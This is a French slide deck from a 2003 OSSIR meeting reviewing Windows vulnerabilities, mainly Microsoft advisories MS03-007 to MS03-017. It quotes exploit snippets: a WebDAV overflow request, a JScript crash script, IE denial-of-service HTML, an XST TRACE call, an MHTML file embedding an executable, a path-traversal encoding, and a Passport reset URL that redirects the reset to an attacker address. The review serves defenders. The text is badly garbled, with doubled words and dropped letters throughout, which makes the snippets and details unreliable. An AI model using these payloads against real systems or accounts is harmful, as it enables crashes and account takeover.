OSSIR Groupe Sécurité Windows Réunion du du 12 12 mai 2003 page 1
Revue s rnières vulnérabilités Windows Nicolas RUFF nicolas.ruff@elweb.fr page 2
Avis Microsoft (1/6) Avis sécurité Microsoft puis 10/03/2003 MS03-007 ::«buffer overflow» dans protoco WebDAV Affecte :: IIS IIS 5.0 5.0 (plateforme Windows 2000) 2000) Exploit Exploit :: SEARCH /AA.AAA (tail (tail du du buffer buffer 65 65535 535 caractères) Cause Cause :: NTDLL.DLL!! WebDAV est est activé activé par par défaut défaut Désactivab Désactivab sur sur W2K W2K SP2 SP2 SRP1 SRP1 par par la la clé clé HKLM\SYSTEM\CCS\Services\W3SVC\Parameters\DisabWebDAV URLScan protège contre contre cette cette attaque Le Le hotfix hotfix est est incompatib avec avec s s systèmes pre-sp3 Version Version Ntoskrnl.exe Ntoskrnl.exe entre entre 5.0.2195.4797 5.0.2195.4797 et et 5.0.2195.4928 5.0.2195.4928 OWA OWA ne ne serait serait pas pas affecté affecté Utilise Utilise sa sa propre propre pi pi WebDAV WebDAV page 3
Avis Microsoft (2/6) MS03-008 :: fail fail dans dans Widows Script Script Engine Engine Affecte Affecte :: WSH WSH 5.1, 5.1, 5.5 5.5 et et 5.6 5.6 Exploit Exploit :: <script> <script> var var trigger trigger = []; []; i i = = 1; 1; do do {trigger[i] {trigger[i] = = 1;} 1;} whi(i++ whi(i++ < < 10000); 10000); trigger[0x3fffffff] trigger[0x3fffffff] = = 1; 1; trigger.sort(new trigger.sort(new Function("return Function("return 1")); 1")); </script> </script> Cause Cause :: JSCRIPT.DLL JSCRIPT.DLL MS03-009 :: fail fail dans dans «DNS DNS forwarr» ISA ISA Server Server 2000 2000 Affecte Affecte :: ISA ISA Server Server 2000 2000 Exploit Exploit :: un un paquet paquet DNS DNS malformé malformé peut peut planter planter composant composant filtrage filtrage DNS, DNS, provoquant provoquant un un déni déni service service DNS DNS Cause Cause :: bogue bogue dans dans filtre filtre DNS DNS MS03-010 :: fail fail dans dans «RPC RPC endpoint mapper» Affecte Affecte :: Windows Windows NT NT // 2000 2000 // XP XP Cause Cause :: erreur erreur d implémentation d implémentation dans dans la la négociation négociation la la connexion connexion RPC RPC Pas Pas patch patch pour pour Windows Windows NT4 NT4!! Seu Seu recommandation recommandation : : filtrer filtrer port port TCP/135 TCP/135 page 4
Avis Microsoft (3/6) MS03-011 :: vulnérabilité JVM Affecte :: JVM JVM jusqu à la la version 5.0.3809 inclus inclus Cause Cause :: bogue bogue dans dans ByteCo Verifier Exploit Exploit :: exécution co co Java Java sans sans contrô sécurité («(«sandbox»)») MS03-012 :: déni service Winsock Proxy Affecte :: Winsock Winsock Proxy Proxy (MS (MS Proxy Proxy 2.0) 2.0) Microsoft Microsoft Firewall Firewall (ISA (ISA Server Server 2000) 2000) Cause Cause :: bogue bogue dans dans modu proxy proxy Exploit Exploit :: un un paquet paquet malformé envoyé au au proxy proxy puis puis réseau réseau interne met met CPU CPU à 100% 100% MS03-013 :: déborment buffer dans Kernel Windows Affecte :: Windows NT4 NT4 // 2000 2000 // XP XP Cause Cause :: déborment buffer buffer dans dans sous-système gestion s s messages débogage Exploit Exploit :: un un utilisateur interactif peut peut venir SYSTEM page 5
Avis Microsoft (4/6) MS03-014 :: accès aux aux fichiers locaux via via une une URL malformée Affecte :: Outlook Express 5.5 5.5 et et 6.0 6.0 // Outlook 98, 98, 2000 2000 et et 2002 2002 Cause Cause :: bogue bogue dans dans handr MHTML Exploit Exploit :: cture cture // exécution fichiers via via MHTML (suivant la la version d'outlook, l'utilisateur vra vra cliquer cliquer sur sur lien lien ou ou non) non) MS03-015 :: patch cumulatif pour IE IE Affecte :: IE IE 5.01, 5.01, 5.5 5.5 et et 6.0 6.0 Causes :: "Buffer "Buffer overflow" overflow" dans dans URLMON.DLL URLMON.DLL Upload Upload automatique automatique fichiers fichiers Injection Injection script script par par biais biais d'une d'une extension extension "tierce "tierce partie" partie" Injection Injection script script par par biais biais d'un d'un dialogue dialogue modal modal Exploit Exploit :: exécution co co dans dans contexte l'utilisateur page 6
Avis Microsoft (5/6) MS03-016 :: patch patch cumulatif Biztalk Biztalk Server Server Affecte Affecte :: Biztalk Biztalk Server Server 2000 2000 et et 2002 2002 Causes Causes :: Déborment Déborment buffer buffer dans dans parser parser HTTP HTTP (version (version 2002) 2002) Injection Injection SQL SQL Exploit Exploit :: Exécution Exécution co co sur sur serveur serveur (contexte (contexte SYSTEM SYSTEM?)?) Modification Modification la la base base données données MS03-017 :: exécution co co via via un un "skin" "skin" Media Media Player Player Affecte Affecte :: Media Media Player Player 7.1 7.1 et et XP XP (8.0) (8.0) Causes Causes :: absence absence filtrage filtrage s s caractères caractères spéciaux spéciaux dans dans l'url l'url Exploit Exploit :: Lorsqu'un Lorsqu'un fichier fichier "skin" "skin" est est spécifié spécifié (type (type MIME MIME "application/x-ms-wmz"), "application/x-ms-wmz"), la la comman comman suivante suivante est est lancée lancée : : WMPLAYER.EXE WMPLAYER.EXE /LAYOUT /LAYOUT <URL> <URL> Le Le répertoire répertoire temporaire temporaire téléchargement téléchargement peut peut être être "bypassé" "bypassé" en en encodant encodant caractère caractère "..\" "..\" (%2e%2e%5c) (%2e%2e%5c) Un Un co co peut peut être être déposé déposé dans dans %SYSTEMROOT%, %SYSTEMROOT%, %SYSTEMROOT%\System32, %SYSTEMROOT%\System32, %SYSTEMROOT\Java\Trustlib\, %SYSTEMROOT\Java\Trustlib\, etc. etc. Remarque Remarque :: il il suffit suffit que que l'utilisateur l'utilisateur surfe surfe sur sur une une page page Web Web pour pour être être affecté affecté (pas (pas confirmation) confirmation) page 7
Avis Microsoft (6/6) Bultins mis à jour puis 10/03/2003 MS00-084 (!) (!):: vulnérabilité CSS via via un un ActiveX Affecte :: Inxing Service (Windows NT4 NT4 et et 2000) 2000) Cause Cause :: composant CiWebHitsFi Le Le patch patch NT4 NT4 n avait n avait jamais jamais été été mis mis en en ligne ligne!! MS02-071 :: vulnérabilité WM_TIMER Mise Mise à jour jour du du patch patch pour pour s s systèmes NT4 NT4 TSE TSE multi-processeurs MS03-007 :: vulnérabilité NTDLL.DLL Sortie Sortie du du patch patch pour pour NT4 NT4 page 8
Infos Microsoft (1/3) Sécurité s s Pocket PC PC http://www.microsoft.com/france/pocketpc/info/info.asp?mar=/france/te chnet/themes/secur/info/20021121_mblsecur.html Ouvrage «Sécurité sous Microsoft Windows 2000 et et Microsoft Windows XP XP» http://www.microsoft.com/france/mspress/fault.asp?url=/france/mspr ess/ouvrage.asp?ouvrageid=1192 Ouvrages MS MS gratuits http://www.microsoft.com/france/entreprises/info/info.asp?mar=/france/ entreprises/info/20030310-colction.html Diagnostic sécurité par par s s partenaires Microsoft http://www.microsoft.fr/enjeuxsecurite/ Support du du protoco WPA par par Windows XP XP http://support.microsoft.com/?kbid=815485 Tous s s secrets Microsoft http://www.securityoffice.net/mssecrets/ Dont Dont la la difficulté migrer migrer Hotmail d Unix d Unix vers vers Windows page 9
Infos Microsoft (2/3) Une Une clé cléd activation en en volume Windows 2003 Server aurait été été volée Source ZDNet ZDNet Outil Log Log Parser 2.0 2.0 http://www.microsoft.com/downloads/tails.aspx?displaylang=en&fam ilyid=8c4028-e247-45be-bab9-ac851fc166a4 Resource Kit Kit Windows 2003 http://www.microsoft.com/downloads/tails.aspx?familyid=9d467a69-57ff-4ae7-96ee-b18c4790cffd&displaylang=en Guis sécurité Windows 2003 Windows Server Server 2003 2003 Security Gui Gui http://go.microsoft.com/fwlink/?linkid=14845 Threats and and Countermeasures: Security Settings in in Windows Server Server 2003 2003 and and Windows XP XP http://go.microsoft.com/fwlink/?linkid=15159 MSS MSS Glossary http://go.microsoft.com/fwlink/?linkid=16256 page 10
Infos Microsoft (3/3) Microsoft condamné pour publicité mensongère http://www.itweb.co.za/sections/b usiness/2003/0303201315.asp?a= SFT&S=Software&T=Section&O= FPSH FPSH page 11
Autres avis (1/3) Cross-Site Tracking (XST) avec la la comman TRACE IE6 IE6 SP1 SP1 propose s s cookies «httponly» Cette Cette sécurité peut peut être être bypassée avec avec la la comman TRACE xmlhttp.open(trace, xmlhttp.open(trace, http://victim.com, http://victim.com, false); false); Buffer overflow dans s s.mht Exploit From: From: toto toto Subject: Subject: test test Date: Date: Tue, Tue, 44 Mar Mar 2003 200302:16:23 02:16:23 +0900 +0900 MIME-Version: MIME-Version: 1.0 1.0 Content-Type: Content-Type: multipart/related; boundary="----=_nextpart_000_0000_01c2e1f4.0d559ea0"; multipart/related; type="text/html type="text/html X-MimeOLE: X-MimeOLE: Produced Produced By By Microsoft Microsoft MimeOLE MimeOLE V6.00.2800.1106 V6.00.2800.1106 This This is is a a multi-part multi-part message message in in MIME MIME format. format. ------=_NextPart_000_0000_01C2E1F4.0D559EA0 Content-Location:fi:///tomatell.exe Content-Transfer-Encoding: base64 base64 TVpQ TVpQ page 12
Autres avis (2/3) Déni Déni service IE IE Affecte Affecte :: tout tout composant composant basé basé sur sur MSHTML.DLL MSHTML.DLL IE IE 6, 6, OE OE 6, 6, Explorer, Explorer, Cause Cause :: bouc bouc infinie infinie due due au au fait fait que que "#" "#" fait fait référence référence au au document document courant courant Exploit Exploit :: <object <object id="test" id="test" data="#" data="#" width="100%" width="100%" height="100%" height="100%" type="text/x-scriptt" type="text/x-scriptt" VIEWASTEXT></object> VIEWASTEXT></object> <OBJECT <OBJECT TYPE="text/html" TYPE="text/html" DATA="#" DATA="#" /> /> <object <object id=crash id=crash classid="clsid:00022613-0000-0000-c000-000000000046" classid="clsid:00022613-0000-0000-c000-000000000046" width=1 width=1 height=1 height=1 > > </object> </object> Autre Autre crash crash IE IE Affecte Affecte :: IE IE 66 Cause Cause :: bogue bogue Exploit Exploit :: <html><form><input <html><form><input type type crash="immediately"></form></html> "Race "Race Condition" à l'arrêt l'arrêt s s services Affecte Affecte :: Windows Windows NT4 NT4 // 2000 2000 // XP XP (pas (pas correctif) correctif) Cause Cause :: erreur erreur programmation programmation dans dans certains certains services services Exploit Exploit :: création création fichiers fichiers temporaires temporaires contenant contenant s s données donnéessensibs sensibs (dump (dump mémoire, mémoire, rniers rniers documents documents ouverts) ouverts) page 13
Autres avis (3/3) Modifier mot passe n'importe quel utilisateur Passport https://register.passport.net/emailpwdreset.srf?lc=10 33&em=victime@hotmail.com&id=&cb=&prefem=atta cker@attacker.com&rst=1 "Flood" s zones sécurité IE IE Affecte :: IE IE 6 Cause :: bogue Exploit :: au-là 200 200 requêtes "fi://" simultanées, s s zones sécurité ne ne sont plus vérifiées Elcomsoft Advanced EFS Recovery 1.1 page 14
Questions / réponses Questions // réponses Date la la prochaine réunion :: Lundi 2 juin juin2003 N'hésitez pas à proposer s sujets et et s sals page 15